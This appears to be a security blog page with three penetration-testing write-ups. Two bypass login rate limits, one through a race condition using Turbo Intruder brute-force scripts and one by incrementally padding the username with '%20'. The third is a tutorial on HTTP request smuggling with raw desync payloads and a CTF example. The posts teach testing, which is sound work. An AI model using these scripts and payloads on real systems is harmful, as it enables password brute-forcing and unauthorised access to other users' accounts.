Now Loading ...
-
Rate-Limit Evasion Through Race Condition
About the bog
Author: Nachiket Rathod
Genre: Web Application
Objective: Bypassing a robust login rate-limiting mechanism through Race Condition.
TL;DR: Breaking the Limit
Encountered a secure login rate-limiting mechanism that blocks access for a set duration after multiple failed login attempts. Standard bypass methods failed like trying to pick a digital lock with a toothpick 😜 but with persistence and creative problem-solving approach, the rate limit was successfully bypassed, reinforcing the importance of perseverance in security testing. 🚀
Challenges 🔐
We’ve tried the all possible known methods but no luck!
Attempted Bypasses:
Using Special Characters: ❌
Null Byte (%00) at the end of the email.
Common characters that help bypassing the rate limit:
0d, %2e, %09, %0, %00, %0d%0a, %0a, %0C, %20.
Adding HTTP Headers & IP Spoof: ❌
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Investigating Rate Limiting Mechanism: 🕵️♂️
After exploring all possible known methods, an analysis was conducted to understand how the rate-limiting was implemented. Requests were intercepted, and a brute-force attempt was made using an intruder. Over 100 different password combinations were tested. Upon completing the attack, it was observed that the application enforced rate limiting after three unsuccessful attempts, displaying the error message: "Too many incorrect attempts. Please try again later after 10 minutes."
Race Condition: 🏃
Race conditions are a common security vulnerability related to business logic flaws. They happen when a website processes multiple requests at the same time without proper safeguards. This allows different threads to access and modify the same data simultaneously, leading to conflicts or unexpected behaviour. In a race condition attack, an attacker sends carefully timed requests to trigger these conflicts and manipulate the application for malicious purposes.
👉 The key challenge in exploiting race conditions is ensuring that multiple requests are processed simultaneously with minimal timing differences, ideally within 1 millisecond or less.
HTTP/2: Single-Packet Attack v/s. HTTP/1.1: Last-Byte Synchronization
👉 HTTP/2: Allows two requests to be sent over a single TCP connection, minimizing network jitter. However, due to server-side variations, relying on just two requests may not consistently trigger a race condition.
👉 HTTP/1.1: Last-Byte Sync: Enables pre-sending most of the data for 20-30 requests, holding back a small portion, and then releasing it simultaneously to force synchronized processing on the server.
Steps for Last-Byte Sync Preparation:
1.) Send request headers and body, leaving out the final byte, while keeping the stream open.
2.) Pause for 100ms after the initial send.
3.) Disable TCP_NODELAY to leverage Nagle’s algorithm, ensuring final frames are batched.
4.) Send a ping to warm up the connection.
5.) Release the withheld frames, ensuring they arrive in a single packet (verifiable via Wireshark).
Note: This method is ineffective for static files, as they are not typically involved in race condition exploits.
🔹 Adapting to Server Architecture:
Understanding the target’s architecture is key. Front-end servers may route requests differently, affecting timing. Sending harmless pre-requests can help normalize request timing by warming up server-side connections.
🔹 Handling Session-Based Locking:
Some frameworks, like PHP’s session handler, serialize requests per session, making vulnerabilities harder to detect. Using unique session tokens for each request can bypass this restriction and improve attack timing.
🔹 Overcoming Rate or Resource Limits:
If connection warming doesn’t work, intentionally flooding the server with dummy requests can trigger rate or resource limit delays. This can create conditions favorable for a single-packet attack, increasing the chances of a successful race condition exploit.
The Attack: 🪓
🔭 The Manual Approach
Step-1: Intercept the application’s login request and redirect it to the intruder, then send the request and observe the normal request and its response using valid credentials.
Fig 1: Observe the valid request and response.
Step-2: Send the request to the Intruder, select the password position, and choose the sniper-attack option. Enter the password combinations, including one valid password and the rest as invalid. Initiate the attack, and upon completion, observe the remaining attempts in the response.
Fig 2: Observe the remaining attempts.
Step-3: Navigate to the third request in Intruder and examine the response to check the remaining attempts.
Fig 3: Observe the remaining attempts: Zero.
Step-4: Same step-3, navigate to the 100th request with a valid password and observe its response.
Fig 4: Observe the remaining attempts: Zero.
Step-5: Now, for the manual Race-Condition attack, create 100 tabs in Repeater, with one valid password and the rest as invalid. Use Burp’s Create Group feature to combine all the tabs into a single group.
Fig 5: Screenshot shows the Create/Edit Group feature.
Step-6: The first 99 tabs contain incorrect passwords, except for the last one. Now, select Send group in parallel (single-packet attack), and then click the Send button to dispatch all requests in the group.
Fig 6: Screenshot shows single-packet attack.
Step-7: Observe the remaining attempts in the response. For example, in this case, the first tab shows -40.
Fig 7: Screenshot shows the error message with 401 with remaining attempts.
Step-8: Navigate to any other tabs and observe that the same remaining attempts value appears in the response. For example, in the screenshot below, the value is -79.
Fig 8: Screenshot shows the error message with 401 with remaining attempts.
Step-9: Navigate to the last tab and observe that the request containing the correct password received a valid response with a user token.
Fig 9: Screenshot shows the success response.
🔭 The Automated Approach 👉 Turbo Intruder
🔹This section demonstrates a method to exploit a race condition vulnerability in a login page by utilizing Turbo Intruder, an advanced HTTP request engine designed for high-speed and parallel attacks.
🔹The provided Python script uses Turbo Intruder’s request engine to perform a brute-force attack by sending multiple login attempts in parallel. These requests are queued and dispatched simultaneously through a single gate mechanism, leveraging a single-packet attack technique to bypass conventional rate limiting and account lockout protections.
def queueRequests(target, wordlists):
# If the target supports HTTP/2, use Engine.BURP2 to trigger the single-packet attack
# If they only support HTTP/1, use Engine.THREADED or Engine.BURP instead
# For more information: https://portswigger.net/research/smashing-the-state-machine
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
engine=Engine.BURP2
)
# Assign a list of candidate payloads from the clipboard
payloads = wordlists.clipboard # Ensure you copy a wordlist to your clipboard
# The 'gate' argument withholds part of each request until openGate is invoked
# If you see a negative timestamp, the server responded before the request was complete
for password in payloads: # Iterating through password wordlist
engine.queue(target.req % password, gate='race1') # Injecting the payload into the request
# Once every 'race1'-tagged request has been queued, send them in sync
engine.openGate('race1')
def handleResponse(req, interesting):
table.add(req)
⌛ Script 👉 Multiple Gates
def queueRequests(target, wordlists):
# Use HTTP/2 for a single-packet attack
engine = RequestEngine(
endpoint=target.endpoint,
concurrentConnections=5, # Allow parallel request queuing
engine=Engine.BURP2
)
# Get passwords from clipboard
passwords = wordlists.clipboard
# Use multiple gates to avoid Turbo Intruder's 99-request limit
max_per_gate = 50 # Adjust based on testing
gate_index = 1
current_gate = "race" + str(gate_index) # Fixed string formatting
count = 0
for password in passwords:
engine.queue(target.req % password, gate=current_gate)
count += 1
# If we reach the max_per_gate limit, switch to a new gate
if count % max_per_gate == 0:
engine.openGate(current_gate) # Release current batch
gate_index += 1
current_gate = "race" + str(gate_index) # Fixed formatting
# Ensure the last batch is sent
engine.openGate(current_gate)
def handleResponse(req, interesting):
table.add(req)
🔹This approach targets systems vulnerable to TOCTOU (Time-of-Check to Time-of-Use) flaws, where concurrent requests may result in a successful login even if traditional defenses are in place. When one of the synchronized requests contains valid credentials, the race condition may allow unauthorized access before the system processes invalid attempts. This technique is particularly effective against applications that do not implement proper concurrency control during authentication checks.
Step-10: Copy the list of passwords from the Notepad file.
Fig 10: Screenshot showing the passwords copied to the clipboard.
Step-11: Select the password value from the Repeater tab and send the request to Turbo Intruder. The selected password will automatically be replaced with %s as a placeholder for payload injection.
Fig 11: Screenshot shows the python script for the single-packet attack.
Step-12: Navigate to any random Queue ID(with Incorrect password) and observe the “remaining attempts” value in the response. Example: In the screenshot below, it shows -21.
Fig 12: Screenshot showing the remaining attempts value in negative.
Step-13: Navigate to any other Queue ID where the actual remaining attempts are reflected accurately. Example: In the screenshot below, it displays 0.
Fig 13: Screenshot shows the actual remaining attempts
Step-14: Navigate to the last Queue ID (102) where the actual response is received. This confirms that the brute-force attack was successfully executed using Turbo Intruder through a single-packet attack by sending all requests in parallel.
Fig 14: Screenshot shows the successful single-packet attack.
⚠️ Turbo Intruder Limitations & Fixes
1. Internal Request Batching
Turbo Intruder appears to have an undocumented batching threshold (typically around 99–100 requests).
Requests queued beyond this threshold may be silently dropped, even if engine.openGate() is used.
2. concurrentConnections=1 Causes Queuing Bottlenecks
With only a single connection, all requests are funneled sequentially.
This may lead to:
❌ Delayed request delivery
❌ Dropped requests
❌ Improper synchronization
3. HTTP/2 Multiplexing Limits
Targets using HTTP/2 via Engine.BURP2 may enforce concurrent stream limits.
Exceeding those limits results in:
🚫 Stream resets
🚫 Requests not processed or acknowledged
4. Single Gate Overload
Assigning all requests to the same gate (e.g., race1) can create internal processing issues.
After about 99 requests:
⚠️ The rest may be ignored silently
⚠️ The attack becomes incomplete or ineffective
Remediations and Best Practices
✅ 1. Use Multiple Gates to Distribute Load
# Example:
# gate1 => 0–49 passwords
# gate2 => 50–99 passwords
Assign a unique gate to each batch: race1, race2, race3, …
Call engine.openGate("raceX") after each batch is queued.
✅ 2. Increase concurrentConnections
concurrentConnections = 5 # or higher based on testing
Enables parallel streams.
Helps avoid throttling and improves throughput.
✅ 3. Avoid Assigning >100 Requests Per Gate
Try to keep batches around 90–100 requests max per gate to prevent internal drop issues.
Turbo Intruder performs better when batches are smaller and structured.
✅ 4. Monitor Request Timing
If response timestamps appear before request timestamps:
🕒 It indicates a race failure or premature server response.
Suggests the gate was not used correctly or the request was dropped.
✅ 5. Consider Server-Side Throttling
Although less likely, some targets may:
🛡️ Rate-limit connections
🛡️ Block excessive request bursts
Remediate by:
Adding small delays
Reducing batch size
Switching from BURP2 to THREADED engine if needed.
💡 Summary: Always break requests into smaller groups with unique gates and ensure that you monitor Turbo Intruder’s internal behavior. Tune the configuration based on how the target server handles stream multiplexing and rate limits.
Conclusion:
It’s crucial not to give up when faced with login rate limiting on applications. If default methods prove ineffective, there are numerous alternative ways to bypass these limitations. By thinking outside the box and creating new methods, it’s possible to overcome even the most robust security measures. This adaptability underscores the importance of continuous vigilance and innovation in the field of security.
References:
Portswigger
-
Rate-Limit Evasion Through Pyramid Technique
About the bog
Author: Suresh Budarapu
Genre: Web Application
Objective: Bypassing a robust login rate-limiting mechanism through perseverance and innovative problem-solving.
GT;DR:
In a recent assessment of a web application’s security, a robust login rate-limiting mechanism was encountered. After several unsuccessful login attempts, the application blocked further access and displayed an error message. Despite this challenge, we explored various methods to bypass the mechanism. Initially, standard techniques didn’t work, but with determination and creative problem-solving, we successfully bypassed the rate-limiting mechanism. This experience emphasized the importance of perseverance and innovative thinking in overcoming complex security challenges.
Challanges 🔒
We’ve tried the all possible known methods but no luck!
~ Attampted Bypasses
Using Special Characters ❌
Null Byte (%00) at the end of the email.
Common characters that help bypassing the rate limit:
0d, %2e, %09, %0, %00, %0d%0a, %0a, %0C.
Adding HTTP Headers & IP Spoof: ❌
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Investigating Rate Limiting Mechanism: 🕵️♂️
After trying known methods, we attempted to understand how the rate limiting was implemented. We intercepted the requests and tried to brute force using an intruder. We tested 180 different password combinations. After completing the attack, we observed that the application implemented rate limiting after 23 unsuccessful attempts, throwing the error message: 'Too many incorrect attempts. Please try again later.' This occurred even when entering a valid username.
Demonstrating the Attack: 🪓
Step-1:
Intercept the application’s login request and redirect it to the intruder.
Next, select the password position and choose the sniper-attack option.
Enter the password combinations and initiate the attack.
Upon completion of the attack, observe that the application threw an error message after multiple incorrect attempts, indicating the presence of proper rate limiting
Fig 1. The application has implemented a request rate limit.
Step-2:
After completing the attack, attempt to enter the valid password in the repeat request, resulting in an error.
Despite entering the correct password, the error still persists.
Fig 2. Observe the response with valid passowrd
Step-3:
Now, append the common character '%20' to the username parameter.
Surprisingly, this bypassed the rate-limiting and allowed logging into the application using the valid password even after numerous incorrect password attempts.
Fig 3. observe the success response(Redirection).
Step-4:
Permform the brute-force attack to find the valid password after adding '%20' to the username parameter.
Even after completing the brute force attack, the error message remained the same: 'Too many incorrect attempts. Please try again later.'
Unfortunately, adding the command character '%20' didn't work during the brute-force attack.
Fig 4. Observe the error message again.
Step-5:
Upon attempting a brute force attack, repeat Step-2 and observe the same error message.
Fig 5. Observe the same error message.
Step-6:
After a comprehensive analysis, a new method was attempted: incrementally adding '%20' in each request, which resulted in bypassing the rate-limiting of password attempts.
For example, in the first request, Add the '%20' once, and in the second request, add it twice. Repeat this process till 180 requests, adding 180 ‘%20’ characters.
Choose the Attack-type: Pitchfork.
Fig 6. Choose the attack type and payload positions.
Step-7:
Utilize below Python code to generate incremental ‘%20’ characters.
# Initialize the initial string
pattern = "%20"
# Loop 180 times to print the pattern
for i in range(1, 181):
# Print the pattern for the current iteration
print(f"Time {i}: {pattern}")
# Add another "%20" to the pattern for the next iteration
pattern += "%20"
Utilize the generated payloads at position one, which corresponds to the username parameter.
Fig 7. Add the output as payloads.
Step-8:
Observe the last request after completing the attack, where '%20' was appended 180 times to the username parameter.
Fig 8. observe the heighted request.
Step-9:
Observe that the login rate-limit was bypassed.
Allowing the application to find a valid credentials after numerous unsuccessful password attempts.
Fig 9. Observe the success response
Conclusion:
It’s crucial not to give up when faced with login rate limiting on applications. If default methods prove ineffective, there are numerous alternative ways to bypass these limitations. By thinking outside the box and creating new methods, it’s possible to overcome even the most robust security measures. This adaptability underscores the importance of continuous vigilance and innovation in the field of security.
Ally:
Suresh Budarapu
-
HTTP request smuggling
About the blog
Author: Nachiket Rathod
Genre: Web Application
Objective: Understanding and analyzing HTTP request smuggling (HTTP Desync Attacks) and its critical security implications.
TL;DR:
In this blog we will discuss the nitty-gritty of the HTTP request smuggling/HTTP Desync Attacks.
This vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users, and the page discusses below segments of this vulnerability.
Synopsis
Core concepts
Methodology
Detecting-desync
Confirming-desync
Explore
1. Core concepts 👻
“Smashing into the Cell Next Door”
“Hiding Wookiees in HTTP”
What is HTTP Request Smuggling?
It's a technique for interfering with the way of website process the sequences of HTTP requests that are received from one or more users.
I divided the concept understanding into four parts.
- Front-end
- Back-end
- Content-Length
- Transfer-Encoding
Now let’s understand this vulnerability in depth.
so first will see that how the Front-end and Back-end works.
Fig 1. End users, Front-end and Back-end.
1.) As an End-users what we can directly see?
The answer is Front-end part Right!, and obviously we can’t see the Back-end part or it’s processes.
2.) How the modern days website communicates to each other?
Well they communicate to each other via chain of web-servers speaking HTTP over stream based transport layer protocols like TCP or TLS.
3.) These streams(TLS/TCP) are heavily reused and follows the HTTP 1.1 keepalive protocol.
~ Question - How this protocols works?
As TCP/TLS are heavily reused that means every requests are going to placed back to back on this TCP/TLS-streams, and every server parse HTTP-Headers to identify that where each request starts and stops.
So from all over the world request are coming and passing through this tiny tunnel of TLS/TCP streams and passing to the Back-end and then split up into individual requests.
~ Question - What could possibly go wrong here?
what if an attacker sends an ambiguous request which is deliberately crafted and so that front-end and back-end disagree about how long this messages is.
Now let’s understand above line via following example,
Fig 2. Attacker, Malicious prefix
Example:
If you see the above Fig 2. than Blue block is the orignal request and the Orange Block is the malicious prefix.
Now How the attacker will going to send an ambiguous request?
Answer: an attacker will attach the malicious prefix(Orange-block) with the Orignal(Blue-block) of request, and then the ambiguous request will first reaches to the Front-end server.
Front-end will thinks that this Blue + Orange block of data is one request, so immediately it will send the whole request to Back-end server.
Back-end for some reason it’ll thinks that this message will finishes with second blue block and therefore it thinks that orange bit of data is the start of the next request and it’s just gonna wait for that second request to be finished until that request is completed.
~ Question - what’s gonna complete that request?
Well, it could be someone else sending a request to the application. So an attacker can apply arbitary prefix/content to someone else request via smuggling and That’s the core primitive of this technique [check Fig-3].
Fig 3. Attacker, victim, Front-end and Back-end
How do this request smuggling arise?
Most of the request smuggling vulnerabilities arise due to the HTTP specification provides two different ways to specify where a request ends:
1.) Content-Length header [CL]
2.) Transfer-Encoding header [TE]
Fig 4. Content-Length and Transfer-Encoding herders
Example:
Content-Length header: it specifies the length of the message body in bytes.see the [Fig 4.] as there are six characters in the POST body therefore the Content-Length header value is six.
Transfer-Encoding: it’s useful when we don’t know the length of client request and response received from the server.
Also it's used to specify that the message body uses chunked encoding, that means the message body contains one or more chunks of data.Each chunk consists of the chunk size in bytes (expressed in hexadecimal), followed by a newline, followed by the chunk contents. The message is terminated with a chunk of size zero.
Fig 4: Contains total three chunks of different size in bytes(hexadecimal),
followed by a CRLF(\r\n), followed by chunk data/contents.
5\r\n - chunk size in HEX followed by CRLF as line separator.
Nihar\r\n - First chunk data of five characters in decimal
and obviously the 5 is the hexadecimal chunk size
of the Nihar(chunk data).
---------------------------------------------------------------------------
7\r\n - chunk size in HEX followed by CRLF as line seperator.
Rathod \r\n - Second chunk data of seven characters in
decimal so the 7 is the hexadecimal chunk size
of the (Rathod ) inclding one "space" after
Rathod.
----------------------------------------------------------------------------
10\r\n - chunk size in HEX followed by CRLF as a line seperator
is \r\n - Third chunk -> 5 decimal including white space in first row.
\r\n - count as seperate 2 decimal(\r\n)
Nachiket.\r\n - count as 9 decimal including period(.) sign
0\r\n - The message will terminate with chunk size 0. total decimal number 16 = 10 hexadecimal.
\r\n
Note: Transfer-Encoding will stop reading after the terminating chunk size 0. that is why the last character was the period(.) sign.
Note:
+ Burp Suite automatically unpacks chunked encoding to make messages easier to view and edit.
+ Browsers do not normally use chunked encoding in requests, and it is normally seen only in server responses
Now as we know that HTTP specification provides two different methods(CL and TE) for specifying the length of HTTP messages right!.
So now it might be possible for a single message to use the both methods(CL & TE) at same time, such that they will conflict with each other.
The HTTP specification will prevent this conflict problem by stating that if both the Content-Length and Transfer-Encoding headers are present, then the Content-Length header should be ignored.
This might be sufficent to avoid the ambiguity when only a single server in play, but not when two or more servers are chained together. In this situation, problems can arise for two reasons:
Note:
+ Some servers do not support the Transfer-Encoding header in requests.
+ Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.
So we can say that request smuggling vulnerabilities arise if the Front-end and Back-End servers behave differently in relation to the Transfer-Encoding header, then they might disagree about the boundries between successive requests, and will leads to request smuggling attack.
How we can perform an HTTP request smuggling attack?
As we know that this attack involves both Content-Length and Transfer-Encoding headers into a single request right!
So by manipulating the request so that the Front-end and Back-End servers process the request differently.
Let’s understand the simple approaches
There are four basic approaches by which we can check whether the website is vulnerable with request smuggling or not?
1.) CL.CL: Both Front-end and Back-end server uses the Content-Length header.
2.) CL.TE: the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
3.) TE.CL: the front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
4.) TE.TE: the front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
1. Desynchronizing: the classic approach CL.CL
Fig 5. Front-end and Back-end [CL.CL]
Fig 5. is an example of an ambiguous request, as we are using absolute classic old school Desynchronization technique.
In this example, we simply specifed Content-Length header (CL) twice.
Front-end will use CL - 6 –> will forward data up to Orange one (12345A) to the Back-end.
Back-end will use C.L - 5 –> and it’ll thik that Orange - A is the start of the next request.
In above example, the injected A will corrupt the green user’s real request and they will probably get a response along the lines of “Unknown method APOST”.
Note:
Above technique is old-school and classic that it doesn’t actually work on anything that’s worth hacking these days.
2. Desynchronizing: the chunked approach CL.TE
Fig 6. Front-end and Back-end [CL.TE]
In Fig 6. Front-end will check CL and Back-end will check the TE header. we can perform the simple HTTP request smuggling attack as follow:
Here Front-end will check the Content-Length which is 13, so it will read the request up to the thirteen characters starting from 0 to the end SMUGGLED.
After that the request will go to the Back-end.
Now Back-end will start reading from the first chunk size which is stated to be 0 over here. so obviously it’s gonna terminate the further request from there.
So the word SMUGGLED is going to remain unprocessed over there until the next victim request will arrived.
Once the victim request will arrived over there will get a response Unknown method SMUGGLEDPOST.
3. Desynchronizing: the TE.CL approach
Fig 7. Front-end and Back-end [TE.CL]
In Fig 7. Front-end will check TE and Back-end will check the CL header.
Note:
+ To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
Here the Front-end server processes the Transfer-Encoding header, so it will treat the entire message body as chunked encoding.
Now it will process the first chunk, which is stated to be 8 byte long(Fig 7.) upto the the start of the line following SMUGGLED.
Now it will process the second chunk, which is stated to be zero length, and so is treated as terminating the request.
At last This request is forwarded on to the back-end server.
The back-end server processes the Content-Length header and determines that the request body is 3 bytes long, upto the start of the line following 8(including \r\n).
That means the following bytes, starting with the SMUGGLED are left unprocessed and back-end server will treat these chunk data as start of the next request in the sequence.
Note:
+ This technique(TE.CL) works on quite a few systems, but we can exploit many more by making the TransferEncoding header slightly harder to spot, so that one system doesn't see it.
4. Forcing Desync
Fig 8. Forcing Desync quirks
If a message is received with both a Transfer-Encoding header field and a ContentLength header field, the latter MUST be ignored. – RFC 2616 #
2. Methodology ⚛️
Fig 9. Methodology
The theory behind request smuggling is straightforward, but the number of uncontrolled variables and our total lack of visibility into what’s happening behind the front-end can cause complications.
3. Detecting Desync 🕵️
IMP:
To detect request smuggling vulnerabilities we've to issue an ambiguous request followed by a normal 'Victim' r equest, then observe whether the latter gets an unexpected response.
However, this is extremely prone to interference; if another user's request hits the poisoned socket before our victim request, they'll get the corrupted response and we won't spot the vulnerability.
This means that on a live site with a high volume of traffic it can be hard to prove request smuggling exists without exploiting numerous genuine users in the process.
Even on a site with no other traffic, you'll risk false negatives caused by application-level quirks terminating connections.
So what will be the detecion strategy?
Sequence of messages which make vulnerable backend systems hang and time out the connection.This technique has few false positives, and most importantly has virtually no risk of affecting other users.
Fig 10. Timing Techniques Example:1 and Example:2
Exammple-1:
1.) CL.CL –> [Back-end Response]
Reason: –> Front-end will check CL which is 6 so it will calculate the length upto the Q and forward the request to the Back-end.
once the request will reach to the back-end will again check for the CL which is 6 again and therefore again it’s going to calculate upto the the last character Q and we’ll get the normal response and every thing is fine.
2.) TE.TE –> [Front-end Response]
Reason: –> Fornt-end will check the Transfer-Encoding and therefore will first check the chunk size which is stated to be 3 over here so it will read the next line chunk data which are abc.
Then it will check for the next chunk size for Q which is not defied and also terminating chunk size 0 is not defied in the example-1 right? so that is why will get some error in resonse and Front-end will respond.
3.) TE.CL –> [Front-end response]
Reason: –> Same as [TE.TE]
4.) CL.TE –> [Timeout]
Reason: –> if you see the example 1 with this technique
then Front-end server uses the CL header, so it will only forward the Blue part of data to the back-end and will ommit the Q.
Back-end server uses the TE header, so it will processes the first chunk and waits for the next chunk to arrive. This will cause an observable time delay.
Example-2:
1.) CL.CL –> [Back-end response]
Reason: –> Check the Ex-2(on Right-side), we can see that Fornt-end is checking a CL header which is 6 bytes in length.
0\r\n --> first 3 characters
\r\n --> \r\n in it's own seperate line
x --> last chuck data x
So it will send the whole request to the back-end upto the last orange character x.
Now Back-end will check the CL again and gives the normal response and everything is fine.
2.) TE.TE –> [Back-end Response]
Reason: –> Here, the Front-end is checking a TE header so it will process the first chunk which is 0 over here and therefore it will terminate the further request and send it to the Back-end.
back-end will check the TE header again and same as Front-end will stop reading after the terminating chunk size 0 and will get the normal response and everything is fine.
3.) TE.CL –> [Timeout]
Reason: –> Front-end server will use the TE header and will forward the blue part of data to the Back-end server(due to the terminating chunk size 0), and will ommit the x.
Back-end uses the CL header and will expects more content in the message body, and due to that it’s just going to waits for the remaining content to arrive. This will cause an observable time delay.
Note:
+ The timing-based test for TE.CL vulnerabilities will potentially disrupt other application users if the application is vulnerable to the CL.TE variant of the vulnerability. So to be stealthy and minimize disruption, you should use the CL.TE test first and continue to the TE.CL test only if the first test is unsuccessful.
4.) CL.TE –> [Socket poision ☠️]
Reason: Front-end server will use the CL header and will forward the whole request including the last character x to the Back-end.
Now what happens is back-end will processes with the first chunk size which is stated 0 over here and therfore the remaining part of request(x)is going to remain unprocessed over there, and that is how we can poisoned the socket.
Note:
This approach will poison the backend socket with an X, potentially harming legitimate users. Fortunately, by always running the prior detection method first, we can rule out that possibility.
4. Confirming desync 👍
+ In this step will see the full potential of request smuggling is to prove backend socket poisoning is possible.
+ To do this we'll issue a request designed to poison a backend socket, followed by a request which will hopefully fall victim to the poison.
+ If the first request causes an error the backend server may decide to close the connection, discarding the poisoned buffer and breaking the attack.
+ Try to avoid this by targeting an endpoint that is designed to accept a POST request, and preserving any expected GET/POST parameters.
Note:
Some sites have multiple distinct backend systems, with the front-end looking at each request’s method,URL, and headers to decide where to route it. If the victim request gets routed to a different back-end from the attack request, the attack will fail. As such, the ‘attack’ and ‘victim’ requests should initially be as similar as possible.
Fig 11. Confirming Desync
[Fig 11.] indicates two different methods.and that is how we can perform and confirm the smuggling attack.
CL.TE –> If the attack is successfull the victim request in green will get a 404 response.
TE.CL –> The TE.CL attack looks similar, but the need for a closing chunk means we need to specify all the headers ourselves and place the victim request in the body. Ensure the Content-Length in the prefix is slightly larger than the body.
Note:
+ If the site is live, another user's request may hit the poisoned socket before yours, which will make your attack fail and potentially upset the user. As a result this process often takes a few attempts, and on hightraffic sites may require thousands of attempts. Please exercise both caution and restraint, and target staging servers were possible.
5. Explore 👽
Application server validate http request length on the basis of two headers.
1.) Transfer-Encoding
2.) Content-Length
On Live scenario server has multiple load balancer or Frontend and Backend server which process the request. We are aim to exploit improper validation of request on application. Assume, We have 4 different scenarios:
1.) Frontend server is validating the request length via Transfer-Encoding and Backend server validating via Content-Length headers.
2.) Frontend server is validating the request length via Content-Length and Backend server validating via Transfer-Encoding headers.
3.) Frontend server is validating the request length via Content-Length and Backend server validating via Content-Length headers.
4.) Frontend server is validating the request length via Transfer-Encoding and Backend server validating via Transfer-Encoding headers.
Live Demo:
Fig 12. HTTP request smuggling
GET / HTTP/1.1
Host: 192.168.0.109
Content-Length: 4
Transfer-Encoding: chunked
2c\r\n
GET /path HTTP/1.1\r\n
Host: 127.0.0.1:8080\r\n
\r\n
\r\n
0
On above example we are having the TE-CL Vulnerability on server. Let me explain all values one by one.
“Content-Length” header in request is set according to the size of the "2c\r\n" bytes.
According to method, we are calculating the total size of first line of the content.
Here we also calculating the "\r\n" new line feed.
"Transfer-Encoding" header is calculated by total bytes of the content.
Here we are having simple HTTP GET request which size is 44 till the header ends, after "\r\n\r\n 0" which indicate to stop.
Decimal 44 is now converted to hexadecimal which gives "2c". The reason we have added "2c" before the content is the total hexadecimal value of the content.
After the "0" we have to add two "\r\n" line feed and send the request to the server.
If you send below request to the CTF server. which gives the response with the flag.
GET /a HTTP/1.1
Host: 192.168.0.109
Content-Length: 4
Transfer-Encoding: chunkedasd
2c
GET /flag HTTP/1.1
Host: 127.0.0.1:8080
0
GET /a HTTP/1.1
Host: 127.0.0.1:8080
- LAB - HTTP request smuggling
References:
medium
cgisecurity
blackhat
YouTube
Touch background to close